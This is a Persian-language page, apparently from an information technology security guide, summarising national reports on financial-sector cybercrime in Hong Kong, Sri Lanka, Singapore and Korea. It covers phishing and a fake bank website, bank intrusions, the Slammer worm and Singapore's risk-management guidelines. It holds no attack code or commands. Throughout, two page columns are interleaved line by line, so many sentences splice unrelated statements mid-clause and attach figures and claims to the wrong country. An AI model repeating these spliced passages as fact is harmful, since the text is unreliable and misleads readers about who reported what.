ﺩﺭ ﻫﻨﮓﻛﻨﮓ ،ﻧﺎﻣﻪﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺟﻌﻠﻲ ،ﻭﻳﺮﻭﺳﻬﺎ ،ﻭ ﻛﺮﻣﻬﺎ
ﺍﺳﺘﺮﺍﻟﻴﺎ ﺳﻪ ﻧﻜﺘﻪ ﺍﺳﺎﺳﻲ ﺭﺍ ﻣﻄﺮﺡ ﻛﺮﺩ.
ﺑﺴﻴﺎﺭ ﺭﺍﻳﺞ ﻫﺴﺘﻨﺪ .ﺩﺭ ﻛﻨﺎﺭ ﺍﻳﻦ ﻣﺴﺎﺋﻞ ﻧﺤﻮﺓ ﺭﻓﺘـﺎﺭ ﻣﻬـﺎﺟﻤﻴﻦ
ﺍﻭﻝ ،ﺗــﺎ ﺍﻛﺘﺒــﺮ ۲۰۰۳ﺩﺭ ﺗﻤــﺎﻣﻲ ﻛــﺸﻮﺭﻫﺎﻱ ﻋــﻀﻮ APEC
ﻫﻢ ﺩﭼﺎﺭ ﺗﻐﻴﻴﺮ ﺷﺪﻩ ﺍﺳﺖ .ﺩﺭ ﺍﻳﻦ ﻛـﺸﻮﺭ ﺑﺠـﺎﻱ ﻫـﺪﻑ ﻗـﺮﺍﺭ
ﺩﺭ ﺯﻣﻴﻨﺔ ﺟﺮﺍﺋﻢ ﺳﺎﻳﺒﺮ ﻗﻮﺍﻧﻴﻨﻲ ﻭﺟﻮﺩ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ؛ ﻛﻪ ﻣﻮﺍﺭﺩﻱ
ﮔﺮﻓﺘﻦ ﻣﺴﺘﻘﻴﻢ ﺑﺎﻧﻜﻬﺎ ،ﺿﻌﻴﻔﺘﺮﻳﻦ ﺣﻠﻘـﻪ -ﻳﻌﻨـﻲ ﻣـﺸﺘﺮﻱ -
ﭼﻮﻥ ﻛﻼﻫﺒﺮﺩﺍﺭﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ﺍﻋﻤـﺎﻝ ﻗـﻮﺍﻧﻴﻦ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ
ﻣﻮﺭﺩ ﺣﻤﻠﻪ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﺍﺳﺖ ﻭ ﻟـﺬﺍ ﺁﻣـﻮﺯﺵ ﻣـﺸﺘﺮﻳﺎﻥ ﺑـﺴﻴﺎﺭ
ﺑﺼﻮﺭﺕ ﻓﺮﺍﺑﺨﺸﻲ ﻭ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﺭﺍ ﺩﺭ ﺑﺮ ﻣﻲﮔﻴﺮﻧﺪ.
ﺣﻴﺎﺗﻲ ﺍﺳﺖ.
ﺩﻭﻡ ،ﺁﻣــﻮﺯﺵ ﻭ ﻫﻤﻜــﺎﺭﻱ ﺩﺭ ﺯﻣﻴﻨــﺔ ﺍﺟــﺮﺍﻱ ﻗــﺎﻧﻮﻥ ﺩﺭ ﻫﻤــﺔ
ﺍﺗﻔﺎﻗﻲ ﻛﻪ ﺍﺧﻴﺮﹰﺍ ﺩﺭ ﻳﻚ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻣﺘﻌﻠﻖ ﺑﻪ ﻳﻚ ﺑﺎﻧﻚ ﺟﻌﻠﻲ ﺳﻄﻮﺡ ﻻﺯﻡ ﺍﺳﺖ ﻭ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﺑـﺼﻮﺭﺕ
ﺭﻭﻱ ﺩﺍﺩ ،ﻣﺸﻜﻼﺕ ﺍﻣﻨﻴﺘـﻲ ﺭﺍ ﺁﺷـﻜﺎﺭﺗﺮ ﻛـﺮﺩ .ﺍﻳـﻦ ﺑﺎﻧـﻚ ﺩﺭ ﺧﻼﺻﻪ ﺩﺭ ﺍﻳﻦ ﺩﻭﺭﻩﻫﺎ ﻗﺮﺍﺭ ﺧﻮﺍﻫﻨﺪ ﺩﺍﺷﺖ .ﺑﺮﻧﺎﻣﺔ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ
ﭘﺎﻳﮕﺎﻩ ﻭﺏ ،ﻳﻚ ﺁﺩﺭﺱ ﭘﺴﺘﻲ ﻧﺎﻗﺺ ﻗﺮﺍﺭ ﺩﺍﺩﻩ ﺑﻮﺩ ﻭ ﺍﺯ ﮔﻮﺍﻫﻲ
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٢٢٦
ﻛﺮﻩ ﺁﻣﺎﺭﻱ ﺍﺭﺍﺋﻪ ﻛﺮﺩ ﻛﻪ ﻧﻤﺎﻳﺎﻧﮕﺮ ﺳﻄﺢ ﭘﺎﻳﻴﻦ ﺁﮔﺎﻫﻲ ﺍﻓـﺮﺍﺩ ﺩﺭ ﺩﻳﺠﻴﺘﺎﻝ ﻫﻢ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﻲ ﻛﺮﺩ ،ﻭ ﻫﻤﭽﻨـﻴﻦ ﺍﺩﻋـﺎ ﺩﺍﺷـﺖ ﻛـﻪ
ﺧﺼﻮﺹ ﺍﻳﻤﻨـﻲ ﺳﻴـﺴﺘﻢ ﺑـﻮﺩ .ﺑـﻪ ﮔﻔﺘـﺔ ﻭﺯﺍﺭﺕ ﺍﻃﻼﻋـﺎﺕ ﻭ ﺩﻓﺎﺗﺮﻱ ﺩﺭ ﻧﻴﻮﻳﻮﺭﻙ ﻭ ﻧﻘﺎﻁ ﺩﻳﮕﺮ ﺩﺍﺭﺩ؛ ﺍﻣﺎ ﺩﺭ ﺑﺎﺯﺭﺳﻴﻬﺎ ﻣﻌﻠـﻮﻡ
ﺍﺭﺗﺒﺎﻃﺎﺕ ،ﺗﻨﻬﺎ %۱۲،۹ﺷﺮﻛﺘﻬﺎﻱ ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ%۱۶،۷ ، ﺷﺪ ﻛﻪ ﻫﻢ ﺁﻥ ﭘﺎﻳﮕﺎﻩ ﻭﺏ )ﻛـﻪ ﺩﺭ ﭼـﻴﻦ ﻣﻴﺰﺑـﺎﻧﻲ ﻣـﻲﺷـﺪ( ﻭ ﻫـﻢ
ﻣﺆﺳﺴﺎﺕ ﺁﻣﻮﺯﺷﻲ ،ﻭ %۹،۲ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ ﺩﻳﮕـﺮ ﺩﺍﺭﺍﻱ ﺑﺨـﺸﻲ ﺑﺎﻧﻚ ﻣﻮﺭﺩ ﺍﺩﻋﺎ ﺟﻌﻠﻲ ﻫﺴﺘﻨﺪ .ﺍﻳﻦ ﻭﺍﻗﻌﻪ ﺑﺎﺭ ﺩﻳﮕﺮ ﻧﻴﺎﺯ ﺣﻴـﺎﺗﻲ
ﺑﺮﺍﻱ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ﻫـﺴﺘﻨﺪ .ﻛـﺮﻩ ﺍﺷـﺎﺭﻩ ﻛـﺮﺩ ﻛـﻪ ﺍﻣﻨﻴـﺖ ﺑﻪ ﻫﻤﻜﺎﺭﻳﻬﺎﻱ ﻓﺮﺍﺑﺨﺸﻲ ﺭﺍ ﺁﺷﻜﺎﺭ ﻛـﺮﺩ ،ﺑﺨـﺼﻮﺹ ﺑـﻪ ﺍﻳـﻦ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺯ ﺩﻳﺪ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺷﺮﻛﺘﻬﺎ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﻫﺰﻳﻨﺔ ﻣﺒﻬﻢ ﺩﻟﻴﻞ ﻛﻪ ﺗﺒﻬﻜﺎﺭﺍﻥ ﺟﺮﺍﺋﻢ ﺳﺎﻳﺒﺮ ،ﺧﻮﺩ ﺑﺼﻮﺭﺕ ﻓﺮﺍﺑﺨﺸﻲ ﻋﻤـﻞ
ﺍﺳﺖ ﻛﻪ ﺗﻨﻬﺎ ﺑـﺎ ﺗﺨـﺼﻴﺺ ﻣﻨـﺎﺑﻊ ﻭ ﺯﻣـﺎﻥ ﻛـﺎﻓﻲ ﺑـﻪ ﺍﻧﺠـﺎﻡ ﻣﻲﻛﻨﻨﺪ.
ﻣﻲﺭﺳﺪ .ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺗﻨﻬﺎ ﺣـﺪﻭﺩ %۱۲،۹ﺷـﺮﻛﺘﻬﺎﻱ ﺗﺠـﺎﺭﺕ ﻛﺸﻮﺭ ﻫﻨﮓﻛﻨﮓ ﺩﺭﺣﺎﻝ ﺗﻬﻴﺔ ﻣﻘﺪﻣﺎﺗﻲ ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ﺑﺴﺘﺮﻫﺎﻱ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ %۶،۱ﺗﻤﺎﻡ ﺷﺮﻛﺘﻬﺎ ﺩﺭ ﺍﻳﻦ ﻛﺸﻮﺭ ﺑﺮﺍﻱ ﺣﻔﺎﻇـﺖ ﻧﻈﺎﺭﺕ ﺑﺮ ﻣـﺸﺘﺮﻳﺎﻥ ﻭ ﺁﻣـﻮﺯﺵ ﺑـﻪ ﺁﻧﻬـﺎ ﺍﺳـﺖ ،ﻣﺜـﻞ ﺍﻧﺘـﺸﺎﺭ
ﺍﺯ ﺧﻮﺩ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﻬﺎﺟﻢﻳﺎﺏ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ. ﺭﺍﻫﻨﻤﺎﻫﺎﻳﻲ ﺑـﺮﺍﻱ ﺍﻓـﺰﺍﻳﺶ ﺁﮔـﺎﻫﻲ ﻋﻤـﻮﻣﻲ ﺩﺭ ﺍﺑﻌـﺎﺩ ﺣﻴـﺎﺗﻲ
ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ﺍﻋﻼﻥ ﻫﺸﺪﺍﺭﻫﺎﻳﻲ ﺑﺮﺍﻱ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺟـﺮﺍﺋﻢ
ﺳﺮﻳﻼﻧﻜﺎ
ﺭﺍﻳﺎﻧﻪﺍﻱ .ﺑﺮﺍﻱ ﺍﺭﺗﻘﺎﻱ ﺍﻣﺮ ﻧﻈﺎﺭﺕ ﺩﺭ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ،ﺍﻳـﻦ
ﻧﻤﺎﻳﻨﺪﺓ ﺳﺮﻳﻼﻧﻜﺎ ﺑﻴﺎﻥ ﺩﺍﺷـﺖ ﻛـﻪ ﺩﺭ ﺁﻥ ﻛـﺸﻮﺭ ﺗﻬﺪﻳـﺪﻫﺎﻳﻲ ﻛﺸﻮﺭ ﺑﺎ ﺛﺒﺖﻛﻨﻨﺪﮔﺎﻥ ﺩﺍﻣﻨﻪ ٢٤٠ﺭﺍﺑﻄـﺔ ﻧﺰﺩﻳﻜـﻲ ﺩﺍﺭﺩ ﻭ ﺑـﺮﺍﻱ
ﻣﺜﻞ ﻛﺮﻣﻬﺎ ﻭ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﺑﻲﺳﻴﻢ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﺍﻣـﺎ ﻣﻘﺎﻣـﺎﺕ ﻛﻨﺘﺮﻝ ﻧﺎﻣﻬﺎﻱ ﺩﺍﻣﻨﺔ ﻣﺤﻠﻲ ) (.hkﺍﺯ ﻓﺮﺁﻳﻨﺪﻱ ﺧﻮﺩﻛﺎﺭ ﺍﺳﺘﻔﺎﺩﻩ
ﺳﺮﻳﻼﻧﻜﺎ ﺗﺎ ﻛﻨـﻮﻥ ﻫـﻴﭻ ﮔﺰﺍﺭﺷـﻲ ﺩﺭﺧـﺼﻮﺹ ﺣﻤـﻼﺕ ﺑـﻪ ﻣﻲ ﻛﻨﺪ :ﺍﮔﺮ ﻭﺍﮊﺓ "ﺑﺎﻧﻚ" ﻳﺎ ﻫﺮ ﺷﻜﻞ ﺩﻳﮕـﺮ ﺁﻥ ﺩﺭ ﻧـﺎﻡ ﺩﺍﻣﻨـﻪ
ﺳﻴﺴﺘﻤﻬﺎﻱ ﺑﺎﻧﻜﻲ ﺩﺭﻳﺎﻓﺖ ﻧﻜﺮﺩﻩﺍﻧﺪ .ﺍﻳﻦ ﻛﺸﻮﺭ ﺣﺪﻭﺩ ۲۰ﺳﺎﻝ ﺑﻜﺎﺭ ﺭﻓﺘﻪ ﺑﺎﺷﺪ ،ﻣﻮﺿﻮﻉ ﺑﻼﻓﺎﺻـﻠﻪ ﺑـﺮﺍﻱ ﺑﺮﺭﺳـﻲ ﺑـﻪ ﻣﺮﺍﺟـﻊ
ﺍﺳﺖ ﻛﻪ ﺍﺯ ﺩﺳﺘﮕﺎﻫﻬﺎﻱ ﺧﻮﺩﭘﺮﺩﺍﺯ ﺍﺳـﺘﻔﺎﺩﻩ ﻣـﻲﻛﻨـﺪ .ﻫﺮﭼﻨـﺪ ﺫﻳﺼﻼﺡ ﺍﺭﺟﺎﻉ ﺩﺍﺩﻩ ﻣﻲﺷﻮﺩ .ﻧﻴﺮﻭﻫﺎﻱ ﭘﻠﻴﺲ ،ﻣﺮﻛﺰ ﻓﻮﺭﻳﺘﻬﺎﻱ
ﺑﺎﻧﻜﺪﺍﺭﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭ ﺳﺮﻳﻼﻧﻜﺎ ﺩﺭ ﺍﺑﺘﺪﺍﻱ ﺭﺍﻩ ﺍﺳﺖ ﺍﻣـﺎ ﺑـﻪ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ،ﻭ ﻧﻴﺰ ﺩﻭﻟـﺖ ﻫﻨـﮓﻛﻨـﮓ ﻫـﻢ ﺑـﺮﺍﻱ ﺍﻳﺠـﺎﺩ
ﺳﺮﻋﺖ ﺩﺭﺣﺎﻝ ﺭﻭﺍﺝ ﻣﻲﺑﺎﺷـﺪ .ﺗﺒـﺎﺩﻝ ﺳـﻬﺎﻡ ﻭ ﭘـﻮﻝ ﺑـﺼﻮﺭﺕ ﻗﺎﺑﻠﻴﺖ ﻭﺍﻛﻨﺶ ﺳﺮﻳﻊ ﺑﻪ ﺭﺧـﺪﺍﺩﻫﺎ ،ﺑـﺎ ﻧﻬﺎﺩﻫـﺎﻱ ﻣﺨﺘﻠﻔـﻲ ﺩﺭ
ﺍﻳﻨﺘﺮﻧﺘﻲ ﻗﺎﺑﻞ ﺍﻧﺠﺎﻡ ﺍﺳﺖ ،ﺍﻣﺎ ﺍﻳﻨﮕﻮﻧﻪ ﺍﻣﻜﺎﻧـﺎﺕ ﻧﻴـﺰ ﻫﻨـﻮﺯ ﺩﺭ ﺳــﻄﻮﺡ ﺑــﻴﻦﺍﻟﻤﻠﻠــﻲ ﻫﻤﻜــﺎﺭﻱ ﺩﺍﺭﻧــﺪ .ﺳﻴــﺴﺘﻢ ﻧﻈــﺎﺭﺕ ﺑــﺮ
ﻣﺮﺍﺣﻞ ﺍﻭﻟﻴﺔ ﺗﻮﺳﻌﺔ ﺧﻮﺩ ﻫﺴﺘﻨﺪ .ﺩﺭﺣـﺎﻝ ﺣﺎﺿـﺮ ﺩﺭ ﺳـﺮﻳﻼﻧﻜﺎ ﺧﻮﺩﺍﺭﺯﻳﺎﺑﻲ ) ٢٤١(CSAﺩﺭ ﭼﻴﺰﻱ ﺣﺪﻭﺩ ۷۰ﺗﺎ ۸۰ﺑﺎﻧـﻚ ﻭﺟـﻮﺩ
ﻣﻬﻤﺘﺮﻳﻦ ﺭﺧﺪﺍﺩ ﺍﻣﻨﻴﺘﻲ ،ﺳﺮﻗﺖ ﺷﻨﺎﺳﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰﻫﺎﻱ ﺩﺍﺭﺩ ﻭ ﺑﺪﻟﻴﻞ ﻣﺸﻜﻼﺕ ﺧﺎﺹ ﺍﺭﺯﻳﺎﺑﻲ ﺳﺎﻻﻧﻪ ،ﺍﻳﻦ ﺍﺭﺯﻳﺎﺑﻲ ﻧﻴـﺰ
ﻋﺒﻮﺭ ﺍﺳﺖ .ﺑﺮﺍﻱ ﻣﺆﺳﺴﺎﺕ ﺧـﺪﻣﺎﺕ ﻣـﺎﻟﻲ ،ﺳـﻄﺢ ﺁﮔـﺎﻫﻲ ﺍﺯ ﺑﺼﻮﺭﺕ ﺧﻮﺩﻛﺎﺭ ﺍﻧﺠﺎﻡ ﻣﻲﺷﻮﺩ.
ﻣﺨﺎﻃﺮﺍﺕ ﻳﻚ ﻣﺴﺌﻠﻪ ﻛﻠﻴﺪﻱ ﺍﺳﺖ ﻭ ﻫﻤﭽﻨﻴﻦ ﻣﺨﺎﻃﺮﺍﺕ ﺑﺎﻳﺪ
ﺑﻪ ﺩﻗﺖ ﺍﺭﺯﻳﺎﺑﻲ ﺷﻮﻧﺪ. ﺟﻤﻬﻮﺭﻱ ﻛﺮﻩ
ﺑﺎ ﺍﻳﻨﻜﻪ ﻛﺮﻩ ﻧﺘﻮﺍﻧﺴﺖ ﺩﺭ ﺍﻳﻦ ﺑﺤﺚ ﺟﻬﺎﻧﻲ ﺷﺮﻛﺖ ﻛﻨﺪ ،ﺍﻣﺎ ﺑـﻪ
ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺩﺭ ﺑﺨﺶ ﻣﺎﻟﻲ ﺳﻨﮕﺎﭘﻮﺭ
ﺳﺆﺍﻻﺕ ﻣﻄﺮﺡ ﺷﺪﻩ ﺗﻮﺳﻂ ﺑﺎﻧﻚ ﺟﻬﺎﻧﻲ ﭘﺎﺳﺦ ﺩﺍﺩ .ﺁﻧﻬﺎ ﺍﺷـﺎﺭﻩ
ﺗﻮﻧﻲ ﭼﻮ ٢٤٢ﻣﺪﻳﺮ ﻧﻈﺎﺭﺕ ﺑﺮ ﻣﺨﺎﻃﺮﺍﺕ ﻓﻨـﺎﻭﺭﻱ ﺩﺭ ﺍﺩﺍﺭﺓ ﺍﻣـﻮﺭ ﻛﺮﺩﻧﺪ ﻛﻪ ﺍﮔﺮﭼﻪ ﻛﺮﻩ ﺩﺍﺭﺍﻱ ﺷﺒﻜﻪﻫﺎﻱ ﺍﻃﻼﻋﺎﺗﻲ ﭘﻴـﺸﺮﻓﺘﻪﺍﻱ
ﭘﻮﻟﻲ ﺳﻨﮕﺎﭘﻮﺭ ) ٢٤٣(MASﻣﺮﻭﺭﻱ ﺍﺟﻤﺎﻟﻲ ﺑﺮ ﻣﻘـﺪﻣﺎﺕ ﺍﻣﻨﻴـﺖ ﺍﺳﺖ ،ﺍﻣﺎ ﺳﻄﺢ ﺍﻣﻨﻴﺖ ﺁﻧﻬﺎ ﻫﻨﻮﺯ ﺟﺎ ﺑـﺮﺍﻱ ﺍﺭﺗﻘـﺎ ﺩﺍﺭﺩ .ﺩﺭ ﻛـﺮﻩ
ﺳﺎﻳﺒﺮ ﺩﺍﺷﺖ .ﻭﻱ ﺑﺤﺚ ﺧﻮﺩ ﺭﺍ ﺑﺎ ﺑﻴﺎﻥ ﺍﻳﻦ ﻣﻄﻠـﺐ ﺁﻏـﺎﺯ ﻛـﺮﺩ %۶۵ﻣﻌﺎﻣﻼﺕ ﺑﻮﺭﺱ ﺑﺼﻮﺭﺕ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺍﻧﺠﺎﻡ ﻣﻲ ﺷﻮﺩ ﻭ ﺣﺪﻭﺩ
ﻛﻪ ﻣﺴﺌﻮﻟﻴﺖ ﺑﺨﺶ ﺍﻭ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ "ﺑﻪ ﻣﺆﺳﺴﺎﺕ ﺁﮔﺎﻫﻲ ﺩﻫﺪ، ۲۵ﻣﻴﻠﻴﻮﻥ ﻧﻔﺮ ﺍﺯ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨـﺪ .ﺭﺧـﺪﺍﺩﻫﺎﻱ ﺍﺧﻴـﺮ
ﺁﻧﻬﺎ ﺭﺍ ﺗﺤﺖ ﻧﻈﺎﺭﺕ ﻗﺮﺍﺭ ﺩﻫﺪ ،ﻭ ﻳﺎ ﻧﺴﺒﺖ ﺑﻪ ﺁﻧﻬـﺎ ﺳـﺨﺘﮕﻴﺮﻱ ﻣﺜﻞ ﺁﺳـﻴﺒﻬﺎﻱ ﻛـﺮﻡ Slammerﺩﺭ ﮊﺍﻧﻮﻳـﺔ ۲۰۰۳ﺗـﺄﺛﻴﺮﺍﺕ
ﻧﻤﺎﻳﺪ" .ﺳﻨﮕﺎﭘﻮﺭ ﻣﻲﻛﻮﺷﺪ ﺗﺎ ﺑﻪ ﻳﻚ ﻛﺎﻧﻮﻥ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﺧـﺪﻣﺎﺕ ﺷﺪﻳﺪﻱ ﺩﺭ ﻛﺮﻩ ﺩﺍﺷﺖ ﻭ ﻃﺒﻴﻌﺖ ﺷﻜﻨﻨﺪﺓ ﺷـﺒﻜﻪﻫـﺎ ﺭﺍ ﺁﺷـﻜﺎﺭ
ﻣﺎﻟﻲ ﺗﺒﺪﻳﻞ ﺷﻮﺩ ﻭ ﺑﻪ ﻫﻤـﻴﻦ ﺩﻟﻴـﻞ ﻣﻮﺿـﻮﻉ ﺍﻣﻨﻴـﺖ ﻓﻨـﺎﻭﺭﻱ ﻛﺮﺩ.
ﺍﻃﻼﻋﺎﺕ ﺑﺮﺍﻱ ﺁﻥ ﺍﺯ ﺍﻫﻤﻴﺖ ﺧﺎﺻﻲ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ.
ﺗﻀﻤﻴﻦ ﺷﻮﺩ .ﺑﺮﺍﻱ PINﻫﺎ ﻧﻴﺰ ﺑﺎﻳﺪ ﺍﺯ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻗﻮﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺑﺰﺭﮔﺘﺮﻳﻦ ﺑﺎﻧﻜﻬﺎﻱ ﺳﻨﮕﺎﭘﻮﺭ ﺩﺭ ﺳﺎﻟﻬﺎﻱ ۲۰۰۱ﻭ ۲۰۰۲ﺗﻮﺳﻂ
ﺷﻮﺩ؛ ﺍﻣﺎ ﺍﻳﻦ ﺑﻪ ﺗﻨﻬﺎﻳﻲ ﻛﺎﻓﻲ ﻧﻴﺴﺖ ،ﭼـﻮﻥ PINﻫـﺎ ﻛﻮﭼـﻚ ﻧﻔﻮﺫﮔﺮﺍﻥ ﻣﻮﺭﺩ ﺣﻤﻠﻪ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻨﺪ؛ ﻛﻪ ﺍﻳﻦ ﺍﻣﺮ ﻧﺸﺎﻧﺪﻫﻨﺪﺓ ﻧﻴـﺎﺯ
ﻫﺴﺘﻨﺪ ﻭ ﻧﻔﻮﺫﮔﺮﺍﻥ ﺑﺮﺍﺣﺘﻲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺁﻧﻬﺎ ﺭﺍ ﺩﺭﻳﺎﻓﺖ ﻛﻨﻨﺪ. ﻓﻮﺭﻱ ﺍﻳﻦ ﻛﺸﻮﺭ ﺑـﻪ ﺭﺍﻫﺒﺮﺩﻫـﺎﻱ ﻛـﺎﻫﺶ ﻣﺨـﺎﻃﺮﺍﺕ ﺍﻣﻨﻴﺘـﻲ
ﺍﺳﺖ .ﺩﺭ ﺳﺎﻝ ۲۰۰۱ﺑﺰﺭﮔﺘﺮﻳﻦ ﺑﺎﻧﻚ ﺳﻨﮕﺎﭘﻮﺭ ) (UOBﻭﺟـﻮﺩ
ﺍﺩﺍﺭﺓ ﺍﻣــﻮﺭ ﭘــﻮﻟﻲ ﺳــﻨﮕﺎﭘﻮﺭ ﺑــﺮﺍﻱ ﻣﺆﺳــﺴﺎﺕ ﺧــﺪﻣﺎﺕ ﻣــﺎﻟﻲ
ﻳﻚ ﻧﻔﻮﺫﮔﺮ ﺭﺍ ﺩﺭ ﺳﻴﺴﺘﻢ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺑﺎﻧﻜﺪﺍﺭﻱ ﺧﻮﺩ ﻛﺸﻒ ﻛـﺮﺩ.
"ﺭﺍﻫﺒﺮﺩﻫﺎﻱ ﻣﺪﻳﺮﻳﺖ ﻣﺨﺎﻃﺮﺍﺕ ﻓﻨﺎﻭﺭﻱ" ﺷﺎﻣﻞ ۲۶ﺗﻮﺻـﻴﻪ ﺩﺭ
ﺑﺎ ﺍﻳﻨﻜﻪ ﺑﻴﺸﺘﺮ ﺍﻃﻼﻋﺎﺕ ﻣﺮﺑﻮﻁ ﺑﻪ ﺍﻳﻦ ﺭﺧﺪﺍﺩ ﻣﺤﺮﻣﺎﻧـﻪ ﺑـﺎﻗﻲ
ﺯﻣﻴﻨﺔ ﺍﻳﺠﺎﺩ ﺍﻣﻨﻴﺖ ﻻﻳﻪﺍﻱ ﺗﺪﻭﻳﻦ ﻛﺮﺩ .ﺳﻪ ﺩﺳﺘﺔ ﺍﺻـﻠﻲ ﺍﻳـﻦ
ﻣﺎﻧﺪ ،ﺍﻣﺎ ﻣﻌﻠﻮﻡ ﺷﺪﻛﻪ ﻧﻔﻮﺫﮔﺮﻫﺎﻳﻲ ﺍﺯ ﺍﺭﻭﭘﺎﻱ ﺷﺮﻗﻲ ﺑﻪ ﺳﻴﺴﺘﻢ
ﺭﺍﻫﺒﺮﺩﻫﺎ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ:
ﺑﺎﻧﻜﻲ ﺣﻤﻠﻪ ﻛﺮﺩﻩ ﺑﻮﺩﻧﺪ .ﺩﺍﺩﻩﻫﺎﻱ ﺑﺎﻧـﻚ ﻣـﻮﺭﺩ ﺑﺮﺭﺳـﻲ ﻗـﺮﺍﺭ
ﺍﻳﺠﺎﺩ ﻳﻚ ﻓﺮﺁﻳﻨﺪ ﻣﺴﺘﺤﻜﻢ ﺑﺮﺍﻱ ﻣﺪﻳﺮﻳﺖ ﻣﺨﺎﻃﺮﻩ .۱ ﮔﺮﻓﺖ ﻭ ﺳﻴﺴﺘﻢ ﺑﺎﻧﻜﻲ ﺟﻬـﺖ ﺑـﻪﺭﻭﺯﺁﻭﺭﻱ ﺣـﺴﺎﺏ ﻣـﺸﺘﺮﻳﺎﻥ
ﺗﻘﻮﻳﺖ ﻗﺎﺑﻠﻴﺖ ﺩﺳﺘﺮﺳﻲ ،ﺍﻣﻨﻴﺖ ،ﻭ ﻗﺎﺑﻠﻴﺖ ﺑﺎﺯﻳﺎﺑﻲ .۲ ﺩﺳﺘﻜﺎﺭﻱ ﺷﺪ .ﻧﻪﺗﻨﻬﺎ ﭼﻨﺪ ﻣﺎﻩ ﻃﻮﻝ ﻛﺸﻴﺪ ﺗﺎ ﻣﺘﺨﺼﺼﻴﻦ ﺍﺻﻞ
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻗﻮﻱ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﺩﺍﺩﻩﻫﺎ .۳ ﻣﺸﻜﻞ ﺭﺍ ﺑﻴﺎﺑﻨﺪ ،ﺑﻠﻜﻪ ﺗﻼﺵ ﺯﻳﺎﺩ ﻭ ﻫﺰﻳﻨﺔ ﮔﺰﺍﻓﻲ ﺻﺮﻑ ﺷﺪ ﺗﺎ
ﻋﻼﻭﻩ ﺑﺮ ﺗﺪﻭﻳﻦ ﺳﻴﺎﺳﺘﻬﺎﻳﻲ ﺩﺭ ﻣﻮﺭﺩ ﻓﻨﺎﻭﺭﻱ ،ﺍﺩﺍﺭﺓ ﺍﻣﻮﺭ ﭘـﻮﻟﻲ ﻛﺸﻒ ﺷﻮﺩ ﻛﻪ ﭼﻪ ﻛـﺴﺎﻧﻲ ﻭ ﻳـﺎ ﭼـﻪ ﭼﻴﺰﻫـﺎﻳﻲ ﻋﻮﺍﻣـﻞ ﺍﻳـﻦ
ﺳﻨﮕﺎﭘﻮﺭ ﺑﺎﻧﻜﻬﺎ ﺭﺍ ﻣﻠﺰﻡ ﺑﻪ ﺍﻧﺠﺎﻡ ﺣﺪﺍﻗﻞ ﺳـﺎﻟﻲ ﻳﻜﺒـﺎﺭ ﺁﺯﻣـﻮﻥ ﻣﺸﻜﻞ ﺑﻮﺩﻩﺍﻧﺪ.
ﻧﻔﻮﺫ ﻭ ﺍﺭﺯﻳﺎﺑﻲ ﻣﺤﻴﻂ ﻛـﺎﺭ ﻧﻤـﻮﺩ .ﺍﻳـﻦ ﺍﺩﺍﺭﻩ ﺩﺍﺭﺍﻱ ﻳـﻚ ﺗـﻴﻢ ﺩﺭ ﺳﺎﻝ ،۲۰۰۲ﺣﻤﻠﺔ ﺩﻳﮕﺮﻱ ﺑﻪ ﺩﻭﻣﻴﻦ ﺑﺎﻧﻚ ﺑﺰﺭﮒ ﺳـﻨﮕﺎﭘﻮﺭ
ﺑﺨﺶ ﺳﻮﻡ
